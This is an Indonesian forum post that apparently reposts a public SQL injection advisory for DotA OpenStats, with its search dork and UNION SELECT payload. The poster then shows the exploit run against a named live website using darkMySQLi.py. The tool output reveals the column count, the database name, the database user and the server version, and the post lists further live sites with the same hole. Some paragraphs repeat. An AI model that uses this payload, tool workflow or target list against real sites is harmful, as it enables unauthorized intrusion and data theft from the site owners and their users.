12-24-2011, 05:41 PM
awalnya saya main2 ke db-exploit.. ketemu ama exploit temuan anak-anak bangsa ..
kyknya ini situs dota gitu
langsung saya coba di salah satu situs yg menggunakan vendor cms tersebut ,..
yup langsung error mysql nampak
sesuai dengan exploitna .. sy temukan 4 colom .. sy coba pake d4rkMySQLi.py ...
penulusuran lebih jauh ternyata makin tajam ...
sudah saya pm adminnya mudah2an di patch .. karena lebay.web.id setahu ane situs game lumayan terkenal ..
masih ada lagi .. tolong admin di pm ..
http://www.eliteguild.net/rank/index.php?id=
http://www.azuza.web.id/index.php?id=
http://bot.dota.web.id:8000/sexy/index.php?id=
rata-rata situs indo.. masih banyak lagi situs dengan hole yang sama... hikz ..
Quote:=============
# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "© 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP
=============
# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/
=============
[~] Exploit
http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4
============
Made IN INDONESIA
Greetz for All HVM crew
============
kyknya ini situs dota gitu
langsung saya coba di salah satu situs yg menggunakan vendor cms tersebut ,..
Code:
http://rank.battlenet.web.id/index.php?id=
yup langsung error mysql nampak
sesuai dengan exploitna .. sy temukan 4 colom .. sy coba pake d4rkMySQLi.py ...
Code:
cassaprodigy@l3l3r{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://rank.battlenet.web.id/index.php?id=1 --findcol
|--------------------------------------------------|
| [email protected] v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://rank.battlenet.web.id/index.php?id=1
[+] 16:03:44
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,3,4,
[+] Column Length is: 4
[+] Found null column at column #: 1,2,3,
[!] SQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4--
[!] darkMySQLi URL: http://rank.battlenet.web.id/index.php?id=1+AND+1=2+UNION+SELECT+darkc0de,darkc0de,darkc0de,4--
penulusuran lebih jauh ternyata makin tajam ...
Code:
[+] Gathering MySQL Server Configuration...
Database: battlene_bot-godlike
User: [email protected]
Version: 5.0.92-community-log
sudah saya pm adminnya mudah2an di patch .. karena lebay.web.id setahu ane situs game lumayan terkenal ..
masih ada lagi .. tolong admin di pm ..
http://www.eliteguild.net/rank/index.php?id=
http://www.azuza.web.id/index.php?id=
http://bot.dota.web.id:8000/sexy/index.php?id=
rata-rata situs indo.. masih banyak lagi situs dengan hole yang sama... hikz ..